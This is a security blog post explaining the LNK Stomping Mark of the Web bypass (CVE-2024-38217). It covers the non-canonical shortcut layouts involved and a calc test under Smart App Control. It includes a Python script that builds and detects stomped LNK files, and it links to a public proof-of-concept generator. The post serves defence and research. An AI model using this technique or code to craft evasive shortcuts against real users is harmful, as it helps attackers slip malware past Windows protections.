Bypassing Mark of the Web (MoTW) via Windows Shortcuts (LNK): LNK Stomping Technique

Overview

Windows shortcut (LNK) files exist for user convenience, but they have long been abused as an initial access vector. After Microsoft began blocking macros in Internet-sourced Office documents by default in 2022, attackers increasingly shifted to alternative formats such as ISO, RAR, and LNK files. LNK files are typically delivered as email attachments or embedded in compressed archives. When opened, they commonly launch trusted system utilities such as PowerShell, cmd.exe, or mshta.exe, so the payload execution blends in with legitimate system activity.

To mitigate such attacks, Windows attaches Mark of the Web (MoTW) metadata to files downloaded from the Internet, and SmartScreen and Smart App Control (SAC) perform reputation and policy checks based on that metadata. In 2024, however, Elastic Security Labs disclosed a technique called LNK Stomping that abuses Windows Explorer's path normalization to strip the MoTW metadata, bypassing these checks. The issue was assigned CVE-2024-38217, patched on September 10, 2024, and added to the CISA Known Exploited Vulnerabilities (KEV) catalog. This post explains the concept and mechanism of LNK Stomping and discusses its security implications.


LNK File

LNK files are Windows shortcut files that point to a file, folder, or application. The Windows Shell parses the LNK structure to open or execute the designated target. Because these files carry a variety of metadata and execution options (target, arguments, working directory, icon), attackers can manipulate them to run malicious code under the guise of a legitimate shortcut.


LNK File Structure

LNK files follow the binary structure that Microsoft documents in the MS-SHLLINK specification, which consists of the following key sections:

  • Shell Link Header: Core metadata of the LNK file, including the LinkFlags field, whose bits indicate which of the optional structures that follow are present.
  • LinkTarget IDList: A list of shell ItemIDs that identifies the shortcut target's location in the Shell namespace.
  • LinkInfo: Information about the target's location (local path, network path) and the volume it resides on.
  • String Data
    • NAME_STRING: A description of the shortcut shown to the user (the shortcut comment)
    • RELATIVE_PATH: The relative path from the shortcut to the target
    • WORKING_DIR: The working directory used when the target is executed
    • COMMAND_LINE_ARGUMENTS: Arguments passed to the target upon execution
    • ICON_LOCATION: Location of the shortcut icon
  • Extra Data: Additional blocks such as environment variables, console settings, tracker data, and more

Figure 1. LNK file structure


Among these, the section to pay attention to is LinkTarget IDList.

Figure 2. Structure of LinkTarget IDList

The LinkTarget IDList precisely identifies the location of the target the LNK file actually points to by walking the hierarchical Windows Shell namespace: each ItemID describes one level (for example My Computer, a volume, a folder, a file) rather than the whole path as a single string. This is a more expressive and flexible way to specify a location than a plain file path.

Threat actors can abuse this by encoding the target path or its segments in this field in a non-standard form, so that the path is rewritten before the MoTW-based checks run. The specific behavior and cases are covered in the following section on LNK Stomping.


LNK Stomping

LNK Stomping is an attack technique that exploits a vulnerability to bypass the Mark of the Web (MoTW) security feature in Windows, designated as CVE-2024-38217.

For more information about Mark of the Web, please refer to the Mark of the Web (MoTW) Bypass Vulnerability post. In brief, MoTW is Windows metadata that records a file's origin: an NTFS Alternate Data Stream (ADS) named Zone.Identifier is attached to files downloaded from the Internet. Files carrying this label are subject to reputation and policy checks by Windows security features such as Smart App Control (SAC) and SmartScreen, which may warn on or block the execution of files from untrusted sources.

LNK Stomping manipulates the target path or internal structure of a Windows shortcut (.lnk) so that it is non-canonical. When the shortcut is opened, explorer.exe canonicalizes the target and re-saves the LNK file, and the MoTW metadata is lost in the process, so the security checks never see the label. The sequence is as follows:

  1. The user opens an LNK file whose target path or internal structure is non-standard.
  2. explorer.exe detects that the target path recorded in the LNK is not in canonical form.
  3. explorer.exe normalizes the path/structure and overwrites (re-saves) the LNK file.
    1. The Zone.Identifier ADS is not preserved during this rewrite, so the MoTW label is lost.
  4. Because the MoTW label was removed before the security check ran, the file is not subjected to the SmartScreen/SAC check and the target is executed.


The "non-standard path/structure" mentioned above refers to how the path segments in the LinkTargetIDList are recorded, as opposed to the normal layout in which the target path is stored across the IDList array shown in Figure 2. The three variants are as follows:

1. PathSegment type

  • Normally, the target path is split at each backslash (\) into separate entries of the IDList array, a subfield of LinkTargetIDList
  • In this variant, the entire path is stored in a single IDList entry
    • Figure 3, offset 0x7D: the whole path is recorded inside one file-class (ClassType) item, which is structurally invalid

Figure 3. LNK file of the PathSegment type


2. Dot type

  • A period (.) is appended to the end of the target path, producing a structurally invalid path
  • A trailing space triggers the same behavior

Figure 4. LNK file of the Dot type


3. Relative type

  • Like the PathSegment type, this variant does not follow the normal IDList layout
  • Only the file name is recorded instead of the full path, producing a structurally invalid target

Figure 5. LNK file of the Relative type
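To make the LNK structure and the three layouts above concrete, the following Python script is an added example written for this post; it is not code from the original article or from Elastic's lnk_stomping.py. It builds minimal LNK files in memory for a canonical target and for each of the PathSegment, Dot and Relative variants, then parses the ShellLinkHeader and LinkTargetIDList back out and flags the non-canonical layout. The ItemID framing (2-byte ItemIDSize, 2-byte TerminalID) follows MS-SHLLINK; the shell item bodies are an assumed, simplified model of the undocumented Windows formats (root 0x1F, volume 0x2F, file entry 0x31/0x32 with the ANSI primary name at offset 14 of the item), so real samples carry extension blocks this model omits, and the target path is a constructed test value.

```python
# Added example (not code from the original article or from Elastic's
# lnk_stomping.py). Builds minimal LNK files and flags the three stomped
# LinkTargetIDList layouts: PathSegment, Dot, Relative.
# Assumptions: ItemID framing per MS-SHLLINK (2-byte size that counts itself,
# 2-byte TerminalID); item bodies use a simplified model of the undocumented
# shell item formats (root 0x1F + sort index + CLSID, volume 0x2F + ANSI drive,
# file entry 0x31 folder / 0x32 file with a 12-byte fixed header then the ANSI
# primary name). Real items also carry extension blocks, omitted here.
import struct

LINK_CLSID = bytes.fromhex("0114020000000000C000000000000046")   # {00021401-...}
MY_COMPUTER = bytes.fromhex("E04FD020EA3A6910A2D808002B30309D")  # {20D04FE0-...}
HAS_LINK_TARGET_ID_LIST = 0x00000001                              # LinkFlags bit
HEADER_FMT = "<I16sIIQQQIIIHHII"                                  # 76-byte header


def _item(body: bytes) -> bytes:
    """Prefix a shell item body with its ItemIDSize (the size counts itself)."""
    return struct.pack("<H", len(body) + 2) + body

def _root() -> bytes:
    return _item(b"\x1f\x50" + MY_COMPUTER)

def _volume(drive: str) -> bytes:
    return _item(b"\x2f" + drive.encode("ascii") + b"\x00")

def _file(name: str, is_dir: bool) -> bytes:
    # class type, unknown, file size, FAT date, FAT time, attributes, then name
    head = struct.pack("<BBIHHH", 0x31 if is_dir else 0x32, 0, 0, 0, 0,
                       0x10 if is_dir else 0x20)
    return _item(head + name.encode("latin-1") + b"\x00")

def build_idlist(target: str, variant: str) -> bytes:
    """Serialize a LinkTargetIDList for 'normal' or one of the stomped variants."""
    drive, rest = target[:3], target[3:]          # "C:\" and "Windows\...\calc.exe"
    parts = rest.split("\\")
    dirs, leaf = parts[:-1], parts[-1]
    canonical = [_root(), _volume(drive)] + [_file(d, True) for d in dirs]
    if variant == "normal":
        items = canonical + [_file(leaf, False)]
    elif variant == "path_segment":               # whole path inside ONE item
        items = [_root(), _file(target, False)]
    elif variant == "dot":                        # trailing '.' on the leaf name
        items = canonical + [_file(leaf + ".", False)]
    elif variant == "relative":                   # bare file name, no root/volume
        items = [_file(leaf, False)]
    else:
        raise ValueError(f"unknown variant {variant!r}")
    body = b"".join(items) + b"\x00\x00"          # TerminalID closes the list
    return struct.pack("<H", len(body)) + body    # IDListSize counts the terminator

def build_lnk(target: str, variant: str = "normal") -> bytes:
    header = struct.pack(HEADER_FMT, 0x4C, LINK_CLSID, HAS_LINK_TARGET_ID_LIST,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # ShowCommand=1
    return header + build_idlist(target, variant)

def parse_idlist(data: bytes) -> list:
    """Validate the ShellLinkHeader and return the raw item bodies of the IDList."""
    hdr = struct.unpack_from(HEADER_FMT, data, 0)
    if hdr[0] != 0x4C or hdr[1] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    if not hdr[2] & HAS_LINK_TARGET_ID_LIST:
        return []
    (size,) = struct.unpack_from("<H", data, 0x4C)
    pos, end, items = 0x4E, 0x4E + size, []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:                        # TerminalID
            break
        items.append(data[pos + 2:pos + item_size])
        pos += item_size
    return items

def item_text(body: bytes) -> tuple:
    """(kind, name) for one item body under the assumed layout."""
    kind = body[0]
    if kind == 0x1F:
        return "root", ""
    if kind == 0x2F:
        return "volume", body[1:].split(b"\x00")[0].decode("latin-1")
    if kind in (0x31, 0x32):
        return "file", body[12:].split(b"\x00")[0].decode("latin-1")
    return "unknown", ""

def classify(items: list) -> list:
    """Return the stomping patterns present; an empty list means canonical."""
    parsed = [item_text(b) for b in items]
    names = [n for k, n in parsed if k == "file"]
    found = []
    if not parsed or parsed[0][0] != "root":      # Relative: no root/volume anchor
        found.append("relative")
    if any("\\" in n for n in names):             # PathSegment: separator inside one item
        found.append("path_segment")
    if names and names[-1] != names[-1].rstrip(". "):  # Dot: trailing '.' or ' '
        found.append("dot")
    return found

def reconstructed_target(items: list) -> str:
    parsed = [item_text(b) for b in items]
    volume = "".join(n for k, n in parsed if k == "volume")
    return volume + "\\".join(n for k, n in parsed if k == "file")

if __name__ == "__main__":
    TARGET = r"C:\Windows\System32\calc.exe"     # constructed test target
    for variant in ("normal", "path_segment", "dot", "relative"):
        items = parse_idlist(build_lnk(TARGET, variant))
        print(f"{variant:12s} {reconstructed_target(items)!r:34s} {classify(items)}")
```

Running the script prints one line per variant. Note that the normal and PathSegment files reconstruct to the same target string, which is exactly why explorer.exe can silently rewrite a stomped file into the canonical layout without breaking the shortcut. For detection, key on the IDList layout itself (the three findings above) rather than on the presence of the Zone.Identifier stream, since that stream is already gone by the time the rewritten file is inspected.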


To check whether the Windows security features can be bypassed, the LNK Stomping test was conducted under the following conditions.

  • Environment: Windows 10 22H2 (OS build 19045.3803)
    • SAC and SmartScreen enabled
  • LNK creation code: https[:]//github.com/joe-desimone/rep-research/blob/main/lnk_stomping/lnk_stomping.py
  • LNK behavior: launches PowerShell with a pre-set argument that runs calc
  • Both test files (the normal LNK and the stomped LNK) carry the MoTW label


First, when an LNK file without LNK Stomping is executed, SAC blocks it in accordance with its policy because of the MoTW label.

Figure 6. SAC blocking the execution of a malicious LNK file


However, when an LNK file crafted with LNK Stomping is executed under the same conditions, its intended behavior runs without being blocked.

Figure 7. Executing the LNK file crafted with the LNK Stomping technique


Inspecting the alternate data streams of the executed LNK file shows that the Zone.Identifier stream, and with it the MoTW label, is no longer present.

Figure 8. ADS – MoTW deleted


Attack Case

As of this writing, no official report attributes exploitation of CVE-2024-38217 to a specific threat group. However, Joe Desimone of Elastic Security Labs, who disclosed the vulnerability, identified multiple samples on VirusTotal exhibiting LNK Stomping patterns; the oldest submission was six years old as of August 6, 2024.

Furthermore, CVE-2024-38217 was added to the CISA KEV catalog on September 10, 2024, confirming active exploitation. Rapid7 also highlighted the issue in its Patch Tuesday analysis, referencing the public research and GitHub-hosted proof-of-concept code. While attribution remains unclear, the KEV listing together with the VirusTotal sample history indicates that attackers have been using this technique for years.


Conclusion

Attacks abusing LNK files have become a persistent threat rather than a one-time trend. Techniques like LNK Stomping show how adversaries keep refining evasion methods to bypass modern security controls. The assignment of CVE-2024-38217 and its listing in the CISA KEV catalog on September 10, 2024 underscore the real-world impact and operational use of this bypass.

What makes the LNK Stomping case particularly significant is that it was uncovered through security research rather than incident response. Elastic's findings showed that the evasion method had been in use since at least 2018, long before it was formally documented. This highlights the value of behavioral analysis and file-format research for surfacing stealthy techniques that are not yet reflected in threat intelligence feeds.

Security teams must remain vigilant, continuously updating detection rules and defensive scenarios to account for evolving tactics. Even familiar file types like LNK can be repurposed in novel ways, especially when delivered inside container formats such as ISO images or RAR archives, making proactive threat hunting and adaptive defense essential.
